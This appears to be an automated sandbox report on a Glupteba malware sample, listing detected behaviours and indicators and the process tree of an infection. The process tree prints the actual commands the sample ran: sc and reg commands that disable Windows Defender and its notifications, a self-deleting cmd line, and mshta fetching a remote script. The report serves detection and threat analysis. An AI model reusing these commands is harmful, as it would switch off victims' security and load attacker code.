glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

Processes:

vtoihT1va0ZfxbUHZI21TZ4m.exeKzCxmMJHhCNMmLclOnkcLmqy.exeizHeEhUhzM57UzU61LVUHiyK.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vtoihT1va0ZfxbUHZI21TZ4m.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	KzCxmMJHhCNMmLclOnkcLmqy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	KzCxmMJHhCNMmLclOnkcLmqy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	izHeEhUhzM57UzU61LVUHiyK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	izHeEhUhzM57UzU61LVUHiyK.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vtoihT1va0ZfxbUHZI21TZ4m.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

Processes:

Setup (11).exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Setup (11).exe

Loads dropped DLL 2 IoCs

Processes:

rundll32.exe

pid	Process
5988	rundll32.exe
5988	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral3/files/0x000100000001ab7f-207.dat	themida
behavioral3/files/0x000100000001ab93-206.dat	themida
behavioral3/files/0x000100000001ab99-199.dat	themida
behavioral3/files/0x000100000001ab99-173.dat	themida
behavioral3/files/0x000100000001ab7f-180.dat	themida
behavioral3/files/0x000100000001ab93-176.dat	themida
behavioral3/memory/788-253-0x00000000003D0000-0x00000000003D1000-memory.dmp	themida
behavioral3/memory/3836-251-0x0000000000E40000-0x0000000000E41000-memory.dmp	themida
behavioral3/memory/1124-261-0x0000000000B70000-0x0000000000B71000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

Processes:

izHeEhUhzM57UzU61LVUHiyK.exevtoihT1va0ZfxbUHZI21TZ4m.exeKzCxmMJHhCNMmLclOnkcLmqy.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	izHeEhUhzM57UzU61LVUHiyK.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vtoihT1va0ZfxbUHZI21TZ4m.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	KzCxmMJHhCNMmLclOnkcLmqy.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
183	ip-api.com
8236	geoiptool.com
30	ipinfo.io
31	ipinfo.io
34	api.db-ip.com
35	api.db-ip.com
133	ipinfo.io
134	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

izHeEhUhzM57UzU61LVUHiyK.exevtoihT1va0ZfxbUHZI21TZ4m.exeKzCxmMJHhCNMmLclOnkcLmqy.exe

pid	Process
3836	izHeEhUhzM57UzU61LVUHiyK.exe
788	vtoihT1va0ZfxbUHZI21TZ4m.exe
1124	KzCxmMJHhCNMmLclOnkcLmqy.exe

Suspicious use of SetThreadContext 39 IoCs

Processes:

qp7J1NYdd0R8dKOpPGZH36rL.exejHeKxe0iI2r3sbhVL6AzhET0.exenEY1yGXSpSN1aQEspYCrm9J1.exeqp7J1NYdd0R8dKOpPGZH36rL.exejHeKxe0iI2r3sbhVL6AzhET0.exeqp7J1NYdd0R8dKOpPGZH36rL.exeIBNoSWbm0UZdlYINvPs8oQHo.exe

description	pid	Process	procid_target
PID 4000 set thread context of 4696	4000	qp7J1NYdd0R8dKOpPGZH36rL.exe	124
PID 840 set thread context of 4584	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	116
PID 1048 set thread context of 4592	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	115
PID 3696 set thread context of 4688	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	129
PID 840 set thread context of 4780	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	123
PID 1048 set thread context of 4804	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	117
PID 3696 set thread context of 4972	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	118
PID 840 set thread context of 5096	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	119
PID 1048 set thread context of 5108	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	121
PID 840 set thread context of 2856	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	127
PID 1048 set thread context of 4644	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	128
PID 3696 set thread context of 4876	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	131
PID 840 set thread context of 3468	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	132
PID 1048 set thread context of 636	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	137
PID 3696 set thread context of 4568	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	134
PID 1048 set thread context of 4220	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	136
PID 840 set thread context of 1752	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	135
PID 4028 set thread context of 5352	4028	jHeKxe0iI2r3sbhVL6AzhET0.exe	141
PID 1804 set thread context of 5372	1804	qp7J1NYdd0R8dKOpPGZH36rL.exe	140
PID 1048 set thread context of 5160	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	138
PID 840 set thread context of 5176	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	147
PID 3696 set thread context of 5292	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	139
PID 840 set thread context of 5544	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	143
PID 3696 set thread context of 5660	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	150
PID 3696 set thread context of 6052	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	154
PID 1048 set thread context of 6140	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	155
PID 840 set thread context of 5220	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	157
PID 3696 set thread context of 5420	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	158
PID 1048 set thread context of 5648	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	161
PID 840 set thread context of 4028	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	164
PID 2704 set thread context of 5616	2704	IBNoSWbm0UZdlYINvPs8oQHo.exe	171
PID 3696 set thread context of 5972	3696	qp7J1NYdd0R8dKOpPGZH36rL.exe	166
PID 1048 set thread context of 6036	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	167
PID 840 set thread context of 5384	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	170
PID 1048 set thread context of 4968	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	175
PID 840 set thread context of 5932	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	177
PID 840 set thread context of 5144	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	180
PID 1048 set thread context of 6024	1048	nEY1yGXSpSN1aQEspYCrm9J1.exe	183
PID 840 set thread context of 5032	840	jHeKxe0iI2r3sbhVL6AzhET0.exe	185

Drops file in Program Files directory 7 IoCs

Processes:

zsLO6ceW0uKeobigedGW3lpV.exeVanaHT4QlpsKA0LN1kfvOG6e.exe

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	zsLO6ceW0uKeobigedGW3lpV.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	zsLO6ceW0uKeobigedGW3lpV.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst1.exe	zsLO6ceW0uKeobigedGW3lpV.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	zsLO6ceW0uKeobigedGW3lpV.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	zsLO6ceW0uKeobigedGW3lpV.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	VanaHT4QlpsKA0LN1kfvOG6e.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	VanaHT4QlpsKA0LN1kfvOG6e.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 10 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
3520	3596	WerFault.exe	96
4448	2964	WerFault.exe	105
4144	2964	WerFault.exe	105
5148	2964	WerFault.exe	105
5752	2964	WerFault.exe	105
2164	5220	WerFault.exe	157
4040	2964	WerFault.exe	105
5236	2964	WerFault.exe	105
6284	5892	WerFault.exe	156
4216	7348	WerFault.exe	252

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

nTypivVkaTWTkPpirdg4Z5wY.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	nTypivVkaTWTkPpirdg4Z5wY.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	nTypivVkaTWTkPpirdg4Z5wY.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	nTypivVkaTWTkPpirdg4Z5wY.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

Processes:

schtasks.exeschtasks.exe

pid	Process
4680	schtasks.exe
4768	schtasks.exe

Delays execution with timeout.exe 3 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exe

pid	Process
11532	timeout.exe
32032	timeout.exe
14652	timeout.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

Processes:

pid	Process
34496

Kills process with taskkill 4 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	Process
7060	taskkill.exe
7516	taskkill.exe
6940	taskkill.exe
9296	taskkill.exe

Modifies registry class 3 IoCs

Processes:

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	152	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

Setup (11).exenTypivVkaTWTkPpirdg4Z5wY.exeWerFault.exeWerFault.exe

pid	Process
568	Setup (11).exe
568	Setup (11).exe
4696	nTypivVkaTWTkPpirdg4Z5wY.exe
4696	nTypivVkaTWTkPpirdg4Z5wY.exe
2708
2708
2708
2708
2708
2708
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
3520	WerFault.exe
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
2708
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe
4448	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid	Process
2708

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

nTypivVkaTWTkPpirdg4Z5wY.exe

pid	Process
4696	nTypivVkaTWTkPpirdg4Z5wY.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

4tRyVdCkGztMPzJEuo6el0BL.exeWerFault.exeWerFault.exeWerFault.exevtoihT1va0ZfxbUHZI21TZ4m.exeKzCxmMJHhCNMmLclOnkcLmqy.exeizHeEhUhzM57UzU61LVUHiyK.exeWerFault.exe

description	pid	Process
Token: SeDebugPrivilege	4052	4tRyVdCkGztMPzJEuo6el0BL.exe
Token: SeRestorePrivilege	3520	WerFault.exe
Token: SeBackupPrivilege	3520	WerFault.exe
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeDebugPrivilege	3520	WerFault.exe
Token: SeDebugPrivilege	4448	WerFault.exe
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeDebugPrivilege	4144	WerFault.exe
Token: SeDebugPrivilege	788	vtoihT1va0ZfxbUHZI21TZ4m.exe
Token: SeDebugPrivilege	1124	KzCxmMJHhCNMmLclOnkcLmqy.exe
Token: SeDebugPrivilege	3836	izHeEhUhzM57UzU61LVUHiyK.exe
Token: SeDebugPrivilege	5148	WerFault.exe
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708
Token: SeShutdownPrivilege	2708
Token: SeCreatePagefilePrivilege	2708

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid	Process
2708
2708

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (11).exe

description	pid	Process	procid_target
PID 568 wrote to memory of 4000	568	Setup (11).exe	78
PID 568 wrote to memory of 4000	568	Setup (11).exe	78
PID 568 wrote to memory of 4000	568	Setup (11).exe	78
PID 568 wrote to memory of 4052	568	Setup (11).exe	81
PID 568 wrote to memory of 4052	568	Setup (11).exe	81
PID 568 wrote to memory of 3440	568	Setup (11).exe	80
PID 568 wrote to memory of 3440	568	Setup (11).exe	80
PID 568 wrote to memory of 3440	568	Setup (11).exe	80
PID 568 wrote to memory of 2104	568	Setup (11).exe	79
PID 568 wrote to memory of 2104	568	Setup (11).exe	79
PID 568 wrote to memory of 3696	568	Setup (11).exe	83
PID 568 wrote to memory of 3696	568	Setup (11).exe	83
PID 568 wrote to memory of 3696	568	Setup (11).exe	83
PID 568 wrote to memory of 1772	568	Setup (11).exe	82
PID 568 wrote to memory of 1772	568	Setup (11).exe	82
PID 568 wrote to memory of 3912	568	Setup (11).exe	84
PID 568 wrote to memory of 3912	568	Setup (11).exe	84
PID 568 wrote to memory of 3912	568	Setup (11).exe	84
PID 568 wrote to memory of 3968	568	Setup (11).exe	101
PID 568 wrote to memory of 3968	568	Setup (11).exe	101
PID 568 wrote to memory of 3968	568	Setup (11).exe	101
PID 568 wrote to memory of 3964	568	Setup (11).exe	100
PID 568 wrote to memory of 3964	568	Setup (11).exe	100
PID 568 wrote to memory of 3964	568	Setup (11).exe	100
PID 568 wrote to memory of 1804	568	Setup (11).exe	99
PID 568 wrote to memory of 1804	568	Setup (11).exe	99
PID 568 wrote to memory of 1804	568	Setup (11).exe	99
PID 568 wrote to memory of 2704	568	Setup (11).exe	98
PID 568 wrote to memory of 2704	568	Setup (11).exe	98
PID 568 wrote to memory of 2704	568	Setup (11).exe	98
PID 568 wrote to memory of 3588	568	Setup (11).exe	97
PID 568 wrote to memory of 3588	568	Setup (11).exe	97
PID 568 wrote to memory of 3588	568	Setup (11).exe	97
PID 568 wrote to memory of 4028	568	Setup (11).exe	164
PID 568 wrote to memory of 4028	568	Setup (11).exe	164
PID 568 wrote to memory of 4028	568	Setup (11).exe	164
PID 568 wrote to memory of 3596	568	Setup (11).exe	96
PID 568 wrote to memory of 3596	568	Setup (11).exe	96
PID 568 wrote to memory of 3596	568	Setup (11).exe	96
PID 568 wrote to memory of 4004	568	Setup (11).exe	95
PID 568 wrote to memory of 4004	568	Setup (11).exe	95
PID 568 wrote to memory of 4004	568	Setup (11).exe	95
PID 568 wrote to memory of 3556	568	Setup (11).exe	93
PID 568 wrote to memory of 3556	568	Setup (11).exe	93
PID 568 wrote to memory of 3556	568	Setup (11).exe	93
PID 568 wrote to memory of 840	568	Setup (11).exe	91
PID 568 wrote to memory of 840	568	Setup (11).exe	91
PID 568 wrote to memory of 840	568	Setup (11).exe	91
PID 568 wrote to memory of 1260	568	Setup (11).exe	90
PID 568 wrote to memory of 1260	568	Setup (11).exe	90
PID 568 wrote to memory of 1260	568	Setup (11).exe	90
PID 568 wrote to memory of 8	568	Setup (11).exe	92
PID 568 wrote to memory of 8	568	Setup (11).exe	92
PID 568 wrote to memory of 8	568	Setup (11).exe	92
PID 568 wrote to memory of 3684	568	Setup (11).exe	103
PID 568 wrote to memory of 3684	568	Setup (11).exe	103
PID 568 wrote to memory of 3684	568	Setup (11).exe	103
PID 568 wrote to memory of 788	568	Setup (11).exe	89
PID 568 wrote to memory of 788	568	Setup (11).exe	89
PID 568 wrote to memory of 788	568	Setup (11).exe	89
PID 568 wrote to memory of 1048	568	Setup (11).exe	88
PID 568 wrote to memory of 1048	568	Setup (11).exe	88
PID 568 wrote to memory of 1048	568	Setup (11).exe	88
PID 568 wrote to memory of 3836	568	Setup (11).exe	87

C:\Users\Admin\AppData\Local\Temp\Setup (11).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (11).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:568
- C:\Users\Admin\Documents\nTypivVkaTWTkPpirdg4Z5wY.exe
  "C:\Users\Admin\Documents\nTypivVkaTWTkPpirdg4Z5wY.exe"
  2⤵
  - Executes dropped EXE
  PID:4000
- - C:\Users\Admin\Documents\nTypivVkaTWTkPpirdg4Z5wY.exe
    "C:\Users\Admin\Documents\nTypivVkaTWTkPpirdg4Z5wY.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    PID:4696
- C:\Users\Admin\Documents\mxeg3GH16wfhKHQbuSFwwxsq.exe
  "C:\Users\Admin\Documents\mxeg3GH16wfhKHQbuSFwwxsq.exe"
  2⤵
  - Executes dropped EXE
  PID:2104
- C:\Users\Admin\Documents\MjIjYNDeB3mE4W4L2LiguZWI.exe
  "C:\Users\Admin\Documents\MjIjYNDeB3mE4W4L2LiguZWI.exe"
  2⤵
  - Executes dropped EXE
  PID:3440
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im MjIjYNDeB3mE4W4L2LiguZWI.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\MjIjYNDeB3mE4W4L2LiguZWI.exe" & del C:\ProgramData\*.dll & exit
    3⤵
    PID:9660
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im MjIjYNDeB3mE4W4L2LiguZWI.exe /f
      4⤵
      Kills process with taskkill
      PID:6940
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 6
      4⤵
      Delays execution with timeout.exe
      PID:11532
- C:\Users\Admin\Documents\4tRyVdCkGztMPzJEuo6el0BL.exe
  "C:\Users\Admin\Documents\4tRyVdCkGztMPzJEuo6el0BL.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4052
- C:\Users\Admin\Documents\pkaQ2zA7rP6iHUrdaZtJaycu.exe
  "C:\Users\Admin\Documents\pkaQ2zA7rP6iHUrdaZtJaycu.exe"
  2⤵
  - Executes dropped EXE
  PID:1772
- - C:\Users\Admin\AppData\Local\Temp\EESSImId.com
    "C:\Users\Admin\AppData\Local\Temp\EESSImId.com"
    3⤵
    PID:6908
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\522E.tmp\522F.tmp\5240.bat C:\Users\Admin\AppData\Local\Temp\EESSImId.com"
      4⤵
      PID:7116
    - - C:\Windows\system32\sc.exe
        
        sc config WinDefend start=disabled
        5⤵
        
        PID:6192
    - - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start=disabled
        5⤵
        
        PID:6556
    - - C:\Windows\system32\sc.exe
        
        sc config Sense start=disabled
        5⤵
        
        PID:7064
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisDrv start=disabled
        5⤵
        
        PID:4384
    - - C:\Windows\system32\sc.exe
        
        sc config WdNisSvc start=disabled
        5⤵
        
        PID:6312
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
        5⤵
        
        PID:7040
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:4508
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7348
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7652
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7408
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7904
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:7392
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8708
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:8228
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:9048
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:5288
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:9920
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:7144
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:9924
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        5⤵
        
        PID:3692
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI" | find /i "SecHealthUI"
        5⤵
        
        PID:8560
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx" /s /k /f "SecHealthUI"
        6⤵
        
        PID:5344
      - C:\Windows\system32\find.exe
        
        find /i "SecHealthUI"
        6⤵
        
        PID:9444
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\InboxApplications\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:10924
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\S-1-5-21-1594587808-2047097707-2163810515-1000\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral_neutral_cw5n1h2txyewy" /f
        5⤵
        
        PID:10524
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        5⤵
        
        PID:10524
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v SettingsPageVisibility
        6⤵
        
        PID:10540
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "SettingsPageVisibility" /t REG_SZ /d "hide:windowsdefender;" /f
        5⤵
        
        PID:8176
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:11756
    - - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:11712
- - C:\Users\Admin\AppData\Local\Temp\I0Bjy9zW.com
    "C:\Users\Admin\AppData\Local\Temp\I0Bjy9zW.com"
    3⤵
    PID:7108
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/ra/Encoding.txt
      4⤵
      PID:8236
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
